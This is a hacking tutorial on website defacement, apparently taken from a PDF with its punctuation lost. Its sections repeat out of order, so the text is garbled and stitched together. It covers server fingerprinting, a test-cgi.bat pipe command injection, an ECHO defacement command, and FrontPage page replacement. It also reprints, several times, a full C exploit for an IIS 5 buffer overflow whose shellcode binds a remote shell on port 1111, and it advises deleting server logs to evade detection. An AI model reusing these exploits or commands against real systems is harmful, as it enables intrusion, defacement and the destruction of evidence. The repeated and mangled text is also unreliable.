along with the batch file to execute commands on the remote
server
NOTE If you donrsquot know how to put the | (pipe) character then
donrsquot worry To put the pipe character press Alt+ the
character is just beside your backspace key
So the attack URL will be like this
httpwwwtargetcomcgi-bintest-cgibat|copy+confhttpd
conf+htdocshttpdconf
Through the above URL I have copied the httpdconf file from the
conf directory The conf directory mostly does not have read
access to the Apache web root that is htdocs virtual folder Now
we can easily download the httpdconf file using the following
URL
httptargetcomhttpdconf
Since it occupies in the Apache web root Through this method
you will get the httpdconf file and through the httpdconf file you
can get some worthful information about the web server
Inspecting known vulnerabilities
Generally websites are defaced and hacked using vulnerabilities
related with the server software or the Operating System running
the server software Well most of the lsquohackersrsquo deface websites
using vulnerabilities Please note I am talking about hackers not
script kiddies who deface websites using uncanny softwares So
you must know what vulnerability is well if you donrsquot know then
let me tell you all Vulnerability is an existing flaw or defect in the
software architecture which allows a hacker or cracker to take
control over the system or issue capricious system commands to
the server In every software or application or tool vulnerabilities
persist
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
The above sites contain latest vulnerabilities with exploit codes
Even if you are an elite or a professional you will find the
information useful
Working with Exploits
Well I must say this is the most exciting part of this tutorial
Okay so wwwvictimcom is the target site Well through the
above methods I mean the methods I have explained earlier in
the tutorial through those methods we have found out that the
website is functioning in Microsoft IIS server software So it is
time to find some vulnerability I am using Acutenix Web Security
Scanner to scan for vulnerabilities You guys must know
programming languages like Perl or Socket Programming or C this
is essential because through this you will be able to compile the
exploits So once you get vulnerability try exploiting it by
executing it in your client (browser)
MICROSOFT FRONPAGE EXTENSION EXPLOIT
This is one of the methods for website defacement using Microsoft
Web Publishing Wizard Using this method one can deface
Websites having FrontPage Server extensions By using Microsoft
Web Publishing Wizard one can replace FrontPage Server
extension pages
Follow the steps given below to execute the following exploit
Telnet the Target website or web server in port 80
CTelnet wwwvictimcom 80
You will get a blank screen type GET and continue pressing
enter till the web server responds to your requests
GET ltENTERgtltENTERgt
NOTE Web servers functioning in IIS server have FrontPage
Extensions enabled by default
So After pressing enter you will get the following
HTTP11 400 Bad Request
Server Microsoft-IIS50
Date Thu 17 Feb 2006 041845 GMT
Content-Type texthtml
Content-Length 87
Once you get the HTTP Bad Request you have search for the
homepage Most of the sites have the default homepage as
httpwwwvictimservercommainasp
httpwwwvictimservercomindexhtml
httpwwwvictimservercomindexhtm
httpwwwvictimservercomindexasp
httpwwwvictimservercommainhtm
httpwwwvictimservercommainhtm
httpwwwvictimservercomdefaulthtm
httpwwwvictimservercomdefaultasp
httpwwwvictimservercomdefaulthtml
Keep assaying all possible FrontPage Extensions unless the page
loads If the extension doesnrsquot exist then it will give a 404 Error
Let us say you have got the homepage as
wwwvictimcomindexhtml so design the page which you want
upload or modify the homepage Here the homepage is indexhtml
once you design the page or modify the page save it as
indexhtml
Now open Web Publishing Wizard and follow the steps given
below
- Open Microsoft Web Publishing Wizard
- Now browse the file that you are going to upload Here
indexhtml is the file which we are going to upload
- Now you get a screen where you have to name the web server
Type in anything and click on Advanced
- Select the service provider from the drop down box This is
nothing but the kind of uploading it is going to do Since your
motive is to deface the site select the FrontPage Extended Web
option since this method of defacing works only for FrontPage
enabled sites
- Type the URL of the victim server homepage and in the given
box here it is wwwvictimcomindexhtml
- Here specify the URL that you type in the Web browser to access
the victim server website
- Select the connection method that you use to access the internet
- Click Finish Voila you have successfully replaced the victimrsquos
homepage with yours
Overworking known vulnerabilities to break into a server
Before going deep into vulnerabilities you must know some
coding exploits I am going to present some exploit codes written
in the most powerful programming language C
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 4
ltBODYgtltHTMLgt
Connection to host lost
I have telnetted wwwhackingtheworldilitehostcom into port 80
so I get the above figure in my command prompt
Okay I hope you have figured out what I mean It is mere telnet
response Okay I will tell you what to do you have to telnet a web
server or website into port 80
NOTE I have telnetted the domain name you can telnet the IP
address also
So after telnetting the web server name or the website you will
get a blank screen So in the blank screen type in some requests
like GET HTTP11rnrn then type something like
Hostserver-software then press ltentergt quite a few times until
you get the serverrsquos response The server will respond with its
software information
Examining the Web Server
If you are using Microsoft IIS (Internet Information service) then
you must have noticed that the default installation contains the
website root in CInetpubwwwroot Basically all the directories
of server softwares are called as virtual directories Actually in a
web server each virtual directory is provided with different type
of permissions Permissions like Read Write Execution of Scripts
and Execution of Executable like Dll and server side pages like
ASP CGI etc
Now I am going to describe the methods of analyzing the
directory permission of a virtual directory residing in a web server
READ ACCESS
Whenever you visit a website through your web browser you type
in the domain name Do you know what happens when you type in
the domain name Actually when you type in the domain name
and press enter you are connected to port 80 (HTTP port) of the
IP address linked with the domain name
For Example
You type in wwwhackingtheworldilitehostcom in your web
browserrsquos address bar The IP (Internet Protocol) address of this
site is 7229654 so as soon as you press enter the URL
(Uniform Resource Locator) is redirects the IP address to
7229654indexhtml indexphp indexasp indexjsp or
whatever the index page is configured in the web server Now
once you press enter you will be redirected to Hacking the
Worldrsquos official website In the website you will be able to read
contents from its wwwroot If the wwwroot directory contains
ASP PHP or JSP then those server side pages are executed and
HTML is generated and passed to the browser (client) by IIS
(server) or any web server dynamically When you are able to read
a document from a given directory then it signals that the
directory is readable Normally it has been seen that directories
containing databases files are forbidden with read access for
security reasons
WRITE ACCESS
I will explain HTTP protocol concisely before going to Write
Access Well HTTP is a component of TCPIP stack It was
configured and formulated with the connotation of sharing files
across the Internet HTTP is the acronym of Hyper Text Transfer
Protocol The name itself indicates the description Files can be
uploaded to the server and downloaded from the server through
the HTTP protocol
NOTE Files can be uploaded to the server and downloaded from
the server through the HTTP protocol without the need of any type
of authentication
Well this was technique was employed and executed years ago
Soon computer enthusiaists realized that this kind of technique
was a huge security threat So they developed new techniques to
subdue the security threat Nowadays web servers are designed
and configured as such to give write access to only selected virtual
directories
TIP Try telnetting a web server and find out some good
information about the server and its behavior
Now I am going to explain some commonly used commands
supported by a web server
GET It is used to send requests for read access to a file residing
on the server by the browser (client)
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
GET indexhtml HTTP11rnrn
Sidetrack The HTML (Hyper text markup language) source code of
indexhtml page occupying on the server will be regressed or if
requested for ASP or PHP or any server side executable page then
the dynamically generated HTML page will be shown
DEL This is a command for deleting files on the web server This
command requires write access on the assigned virtual directory
where the file is to be deleted
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
del indexhtml HTTP11rnrn
Sidetrack Most probably you will get a 403 Forbidden Error as it
is quiet obvious that the wwwroot directory will never have a
write access
PUT It is used to create files on the server it necessitates write
access on the particular virtual directory where the file is to be
created
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
PUT cctxt HTTP11rnrn
Sidetrack Most probably you will get a 403 Forbidden Error as it
is quiet obvious that the wwwroot directory will never have a
write access
ECHO The publishing tool it is the same command used in DOS
(Disk Operating System) Batch Files The output can be redirected
Microsoft Telnetgt wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
ECHO Site defaced by SB gtgt indexhtml HTTP11rnrn
TIP SB is the acronym of my name Shubham Bhattacharya
When you are defacing a site you can also use acronyms of your
name
PROPFIND Propfind is used as a request for directory surfing
NOTE In IIS server it is used as an administrative tool for web
server analysis
Microsoft Telnetgt wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
PROPFIND HTTP11
Hostiis-server
Content-Length0
Sidetrack You will definitely get a 403 Forbidden Error as it is
quiet evident that the wwwroot will never have a write access
Well you must be wondering how you can test write access
permission for a particular directory in IIS server
To test the write access permission for a particular directory in IIS
server follow the steps given below
- To test if write access permission is enabled for anonymous web
clients then telnet the web server or the website in port 80 and
make the following request
PUT scriptshtwasp HTTP11
Host iis-server
Content-Length 10 ltentergtltentergt
Once you make the following request the server should respond
with a 100 Continue Message
HTTP11 100 Continue
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105300 GMT
On receiving the above type 10 letters
XXXXXXXXXX
HTTP11 201 Created
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105608 GMT
Location httpiis-serverdirmy_filetxt
Content-Length 0
Allow OPTIONS TRACE GET HEAD DELETE PUT COPY
MOVE PROPFIND PROPPATCH SEARCH LOCK UNLOCK
If the server responds with this 201 Created response then the
write permission is enabled
EXECUTION ACCESS
Server side pages like ASP PHP JSP or DLL are used in highly
advanced database driven dynamic websites which dynamically
generates the HTML and sends it to the client (web browser)
These server side pages and other executables including DLL and
EXE files needs execution perquisites in the virtual directory
where they are kept
NOTE DLL EXE etc need execution perquisites they are kept in a
single virtual directory
DIRECTORY SURFING
It has been often seen that web servers to be more specific
virtual directories of web servers are configured as such to
provide directory surfing access to all clients or special clients
through proper authentications Actually directory browsing
means that you can list the file and folders present in your virtual
directory just as you see in your standalone system Well most of
the web server administrators turn off this feature But exploit
codes can be used to get directory listing of the virtual directory
EXPLOIT FOR DIRECTORY LISTING IN APACHE
Well if you are not familiar with apache then let me give you a
brief description Apache is a server in which you have to
configure your web server using command and scripts These
scripts and commands are kept in httpdconf file in capache
groupapacheconf folder default Apache installation on a
distinctive windows system This file contains all the settings of
the web server and if we get our hands into this file then we get
to know all the settings of the web server including the location of
log files directory permissions write access authentication levels
etc
So now letrsquos get on with the exploit As we know that Apache is
the most preferred web server This web server has a bat in its
cgi-bin directory This bat file is named as test-cgibat Actually
the motive of the bat file is to test the privileges of cgi-bin
directory
NOTE cgi-bin directory contains all the CGI and Perl scripts
Well it is quiet obvious that cgi-bin virtual directory has execution
permissions These conditions are exploited to perform out
pernicious attacks The bat file in Apache web server is called as
execution of DOS (Disk Operating Systems) The DOS shell is
spawned to it for execution Now we can use | (pipe) character
along with the batch file to execute commands on the remote
server
NOTE If you donrsquot know how to put the | (pipe) character then
donrsquot worry To put the pipe character press Alt+ the
character is just beside your backspace key
So the attack URL will be like this
httpwwwtargetcomcgi-bintest-cgibat|copy+confhttpd
conf+htdocshttpdconf
Through the above URL I have copied the httpdconf file from the
conf directory The conf directory mostly does not have read
access to the Apache web root that is htdocs virtual folder Now
we can easily download the httpdconf file using the following
URL
httptargetcomhttpdconf
Since it occupies in the Apache web root Through this method
you will get the httpdconf file and through the httpdconf file you
can get some worthful information about the web server
Inspecting known vulnerabilities
Generally websites are defaced and hacked using vulnerabilities
related with the server software or the Operating System running
the server software Well most of the lsquohackersrsquo deface websites
using vulnerabilities Please note I am talking about hackers not
script kiddies who deface websites using uncanny softwares So
you must know what vulnerability is well if you donrsquot know then
let me tell you all Vulnerability is an existing flaw or defect in the
software architecture which allows a hacker or cracker to take
control over the system or issue capricious system commands to
the server In every software or application or tool vulnerabilities
persist
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
The above sites contain latest vulnerabilities with exploit codes
Even if you are an elite or a professional you will find the
information useful
Working with Exploits
Well I must say this is the most exciting part of this tutorial
Okay so wwwvictimcom is the target site Well through the
above methods I mean the methods I have explained earlier in
the tutorial through those methods we have found out that the
website is functioning in Microsoft IIS server software So it is
time to find some vulnerability I am using Acutenix Web Security
Scanner to scan for vulnerabilities You guys must know
programming languages like Perl or Socket Programming or C this
is essential because through this you will be able to compile the
exploits So once you get vulnerability try exploiting it by
executing it in your client (browser)
MICROSOFT FRONPAGE EXTENSION EXPLOIT
This is one of the methods for website defacement using Microsoft
Web Publishing Wizard Using this method one can deface
Websites having FrontPage Server extensions By using Microsoft
Web Publishing Wizard one can replace FrontPage Server
extension pages
Follow the steps given below to execute the following exploit
Telnet the Target website or web server in port 80
CTelnet wwwvictimcom 80
You will get a blank screen type GET and continue pressing
enter till the web server responds to your requests
GET ltENTERgtltENTERgt
NOTE Web servers functioning in IIS server have FrontPage
Extensions enabled by default
So After pressing enter you will get the following
HTTP11 400 Bad Request
Server Microsoft-IIS50
Date Thu 17 Feb 2006 041845 GMT
Content-Type texthtml
Content-Length 87
Once you get the HTTP Bad Request you have search for the
homepage Most of the sites have the default homepage as
httpwwwvictimservercommainasp
httpwwwvictimservercomindexhtml
httpwwwvictimservercomindexhtm
httpwwwvictimservercomindexasp
httpwwwvictimservercommainhtm
httpwwwvictimservercommainhtm
httpwwwvictimservercomdefaulthtm
httpwwwvictimservercomdefaultasp
httpwwwvictimservercomdefaulthtml
Keep assaying all possible FrontPage Extensions unless the page
loads If the extension doesnrsquot exist then it will give a 404 Error
Let us say you have got the homepage as
wwwvictimcomindexhtml so design the page which you want
upload or modify the homepage Here the homepage is indexhtml
once you design the page or modify the page save it as
indexhtml
Now open Web Publishing Wizard and follow the steps given
below
- Open Microsoft Web Publishing Wizard
- Now browse the file that you are going to upload Here
indexhtml is the file which we are going to upload
- Now you get a screen where you have to name the web server
Type in anything and click on Advanced
- Select the service provider from the drop down box This is
nothing but the kind of uploading it is going to do Since your
motive is to deface the site select the FrontPage Extended Web
option since this method of defacing works only for FrontPage
enabled sites
- Type the URL of the victim server homepage and in the given
box here it is wwwvictimcomindexhtml
- Here specify the URL that you type in the Web browser to access
the victim server website
- Select the connection method that you use to access the internet
- Click Finish Voila you have successfully replaced the victimrsquos
homepage with yours
Overworking known vulnerabilities to break into a server
Before going deep into vulnerabilities you must know some
coding exploits I am going to present some exploit codes written
in the most powerful programming language C
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
